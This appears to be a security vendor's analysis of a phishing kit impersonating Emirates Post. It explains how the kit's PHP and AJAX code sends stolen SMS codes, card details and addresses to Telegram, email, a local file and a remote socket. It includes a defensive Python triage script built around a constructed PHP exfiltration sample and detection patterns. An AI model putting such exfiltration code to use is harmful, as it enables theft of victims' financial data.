“In the digital realm, not everything that glitters is gold.” Cybercriminals regularly use well-known brands to set devious traps aimed precisely at unwary victims. One example is the Emirates Post phishing kit, a well-designed and particularly sophisticated campaign that tricks customers into divulging private and financial information.
The attackers combine sophisticated tooling and redundant data exfiltration tactics to maximize their success, while their close imitation of the official Emirates Post Group website convinces most visitors that the page is genuine.
Anatomy of the Kit
Finding
Bolster researchers discovered, on the CheckPhish platform, a phishing kit impersonating Emirates Post Group, the official postal operator of the UAE (United Arab Emirates), with revenue of around $37.4 billion USD.
Analysis of phishing kit
Exfiltration of Data
By editing the PHP script below, an attacker adds their own email address, Telegram bot token, and chat ID so that stolen information is delivered to their Telegram channel. The script harvests sensitive user data, in particular SMS-based authentication codes. It reads the victim’s IP address and the SMS value submitted through a POST request, builds a GeoIP lookup link to determine the victim’s location, and logs the victim’s browser details. The information is then sent to the attacker over several routes: Telegram, a local text file, and email. This redundancy raises the attacker’s chances of collecting the data successfully.
Exfiltration of Data
The PHP script in the image below is designed to collect and exfiltrate sensitive financial data, including credit card information (card number, cardholder name, expiration date, CVV).
Exfiltration of Data
The PHP script provided below collects and exfiltrates personal information, including the victim’s address, city and phone number.
Exfiltration of Data
The script attempts to open a socket connection to a remote IP address (93.123.39.81) on port 4949, potentially for further exfiltration or command and control.
Attempt Socket Connection
Saved Sample Exfiltrated Data
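The exfiltration channels described above (Telegram bot API, email, local text file, and an outbound socket) can be triaged statically when a kit is recovered. The following is an added example written for this post, not code from the kit or from Bolster; the PHP sample inside it is constructed to mirror the channels described, and the Telegram token, chat ID, mailbox and GeoIP host are placeholders.

```python
import re
from typing import Dict, List

# Constructed sample that mirrors the exfiltration channels the post describes
# (Telegram bot API, email, local text file, outbound socket). It is NOT the
# kit's own code; token, chat id, mailbox and GeoIP host are placeholders.
SAMPLE_PHP = r"""<?php
$ip  = $_SERVER['REMOTE_ADDR'];
$sms = $_POST['sms'];
$msg = "IP: $ip | GeoIP: https://geoip.example.invalid/$ip | SMS: $sms";
file_get_contents("https://api.telegram.org/bot000000000:AAAA-constructed-token/sendMessage?chat_id=987654321&text=" . urlencode($msg));
mail("drop@example.invalid", "New Result", $msg);
file_put_contents("rezult.txt", $msg . "\n", FILE_APPEND);
$sock = fsockopen("93.123.39.81", 4949, $errno, $errstr, 5);
?>"""

# Each rule names one exfiltration channel; the capture groups pull out the
# destination (token, chat id, mailbox, file name, IP and port) for the report.
RULES = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)"),
    "telegram_chat_id": re.compile(r"chat_id=(\d+)"),
    "email_send": re.compile(r"\bmail\s*\(\s*['\"]([^'\"]+)['\"]"),
    "local_file_append": re.compile(r"file_put_contents\s*\(\s*['\"]([^'\"]+)['\"][^;]*FILE_APPEND"),
    "outbound_socket": re.compile(
        r"(?:fsockopen|socket_connect)\s*\([^;]*?['\"](\d{1,3}(?:\.\d{1,3}){3})['\"]\s*,\s*(\d+)"),
}

def triage_kit(php_source: str) -> Dict[str, List[str]]:
    """Map each exfiltration channel found in the PHP source to its destinations."""
    findings: Dict[str, List[str]] = {}
    for name, pattern in RULES.items():
        hits = [":".join(g for g in m.groups() if g) for m in pattern.finditer(php_source)]
        if hits:
            findings[name] = hits
    return findings

EXFIL_CHANNELS = {"telegram_bot_api", "email_send", "local_file_append", "outbound_socket"}

def redundancy_score(findings: Dict[str, List[str]]) -> int:
    """Count distinct delivery channels: the more there are, the more of them a
    defender has to block (Telegram API, mail relay, file drop, IP:port) at once."""
    return len(EXFIL_CHANNELS & findings.keys())

if __name__ == "__main__":
    report = triage_kit(SAMPLE_PHP)
    for channel, dests in report.items():
        print(f"{channel}: {', '.join(dests)}")
    print("redundant channels:", redundancy_score(report))
```

Each destination the script extracts (bot token, chat ID, mailbox, drop file, IP and port) is a candidate blocking or takedown item; the socket rule also covers socket_connect() calls with the same IP-then-port argument order.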
AJAX-Powered Data Exfiltration
The jq.js file, a jQuery-based script, is an integral part of the phishing kit’s functionality, providing the connectivity and data-capture logic. It uses AJAX calls ($.post, $.ajax) to capture sensitive data such as SMS codes and credit card information and send it to the attackers. The script lets the phishing kit steal and leak user data while keeping the page behaving like the legitimate site, which maximizes the campaign’s success.
MITRE ATT&CK
Understanding the tactics and techniques involved is critical for building strong security measures and preventing potential threats. The MITRE ATT&CK TTPs identified after analysis of the webpage and the phishing kit are given below:
MITRE ATT&CK Navigator
Profiling
IOC’s
Mitigation
Conclusion
The Emirates Post phishing kit highlights the increasing prevalence of cyberattacks that exploit users’ trust and awareness. The ability to impersonate legitimate businesses and use advanced filtering techniques poses significant risks to users and organizations. Proactive investigation and vigilant monitoring are critical for detecting and limiting the efforts of the individuals behind sophisticated phishing campaigns, especially as new attack methods emerge. Our analysis underlines the importance of continuous monitoring and of developing forward-looking measures to counter these threats.